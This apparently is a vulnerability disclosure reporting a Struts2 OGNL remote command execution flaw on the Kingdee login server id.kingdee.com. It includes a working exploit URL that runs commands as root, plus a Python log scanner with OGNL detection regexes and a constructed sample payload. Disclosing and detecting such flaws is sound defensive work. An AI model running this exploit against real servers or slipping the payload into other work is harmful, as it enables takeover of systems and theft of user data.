The user login area of the Kingdee website (id.kingdee.com, running as root) allows remote command execution, so a webshell could very likely be obtained (of course, I did not try to obtain one), which threatens the security of user data. An attacker can execute arbitrary commands with root privileges, gain full control of the server, and use it as a stepping stone to attack the other servers around it.
Open the following link in IE (the link is truncated here; only the tail of the OGNL expression survives, shown with its percent-encoding repaired):

http://id.kingdee.com/oauth/authorize.action?...exec(%27id%27).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s3cur1ty.println(%23d)%2c%23s3cur1ty.close()(aa)&x[(class.classLoader.jarPath)('A')]

The output of the command "id" is returned in the response. The second parameter's name, x[(class.classLoader.jarPath)('A')], is itself an OGNL expression: Struts2 accepts it as a parameter name and, while setting it, evaluates the value stored under class.classLoader.jarPath, which is where the command-execution expression lives. (During the test, opening the link in IE displayed the command output directly; opening it in Mozilla Firefox or Google Chrome prompted a file download, and the command output was in the downloaded file.) Replace "id" in exec(%27id%27) in the link with any command to execute it with root privileges.
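As an added example (not part of the original report), the following Python script scans web-server access-log lines for the OGNL injection pattern used above. Decoded parameter names and values are checked for the sandbox-bypass flags, @class@method static calls, Runtime.exec, the ServletActionContext response writer, and the x[(name)('A')] parameter-name trick. The log lines, IP addresses and the payload inside them are constructed for this example; the indicator list is a starting point, not a complete signature set.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Indicators of OGNL expression injection, matched against fully decoded
# parameter names and values. Labels are what scan_query() reports.
OGNL_INDICATORS = [
    # turning off the OGNL sandbox (denyMethodExecution / allowStaticMethodAccess)
    ("sandbox-bypass", re.compile(r"#_memberAccess|xwork\.MethodAccessor\.denyMethodExecution")),
    # static call syntax such as @java.lang.Runtime@getRuntime(
    ("static-call", re.compile(r"@[\w.]+@\w+\(")),
    # process execution
    ("command-exec", re.compile(r"\.exec\(|java\.lang\.ProcessBuilder")),
    # writing command output straight into the HTTP response
    ("response-write", re.compile(r"ServletActionContext@getResponse\(\)")),
    # x[(name)('A')]: a parameter *name* that makes Struts2 evaluate another parameter
    ("param-name-eval", re.compile(r"\w+\[\([^)]*\)\('[^']*'\)\]")),
    # class.classLoader.* used as a parameter name
    ("classloader", re.compile(r"class\.classLoader\.")),
]

# Combined log format; only the fields used here are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log lines for this example (not real Kingdee traffic):
# a benign OAuth request, a single-encoded OGNL injection attempt, and a
# double-encoded attempt that a single pass of URL decoding would miss.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2012:10:00:01 +0800] "GET /oauth/authorize.action?client_id=demo&response_type=code HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Mar/2012:10:00:07 +0800] "GET /oauth/authorize.action?class.classLoader.jarPath=(%23_memberAccess%5b%22allowStaticMethodAccess%22%5d%3dtrue%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2c%23s%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23s.println(%23a)%2c%23s.close())(aa)&x%5b(class.classLoader.jarPath)(%27A%27)%5d HTTP/1.1" 200 97 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
10.0.0.12 - - [01/Mar/2012:10:00:09 +0800] "GET /oauth/authorize.action?foo=(%2523_memberAccess%255b%2522allowStaticMethodAccess%2522%255d%253dtrue)(x) HTTP/1.1" 400 0 "-" "curl/7.21.0"
"""


def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly until stable, so double-encoded payloads are seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_query(target):
    """Return the sorted indicator labels found in the query string of a request target.

    Parameter names are inspected as well as values, because the Struts2 bug
    evaluates the name itself (x[(class.classLoader.jarPath)('A')]).
    """
    found = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for part in (name, value):
            decoded = decode_fully(part)
            for label, pattern in OGNL_INDICATORS:
                if pattern.search(decoded):
                    found.add(label)
    return sorted(found)


def scan_log(lines):
    """Return (ip, target, indicators) for every log line carrying OGNL indicators."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # not a request line in the expected format
        indicators = scan_query(match.group("target"))
        if indicators:
            hits.append((match.group("ip"), match.group("target"), indicators))
    return hits


if __name__ == "__main__":
    for ip, target, indicators in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {', '.join(indicators)}\n    {target[:100]}")
```

Run it against a real access log by replacing SAMPLE_LOG.splitlines() with the file's lines. Decoding is repeated because the web server logs the request as sent, and a double-encoded payload only reveals its # and @ characters on the second pass.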
Solution:
Upgrade Struts2 to a release in which this OGNL parameter-injection vulnerability is fixed. Until the upgrade is done, the application should reject request parameter names and values that contain OGNL syntax such as #, @, ( or [.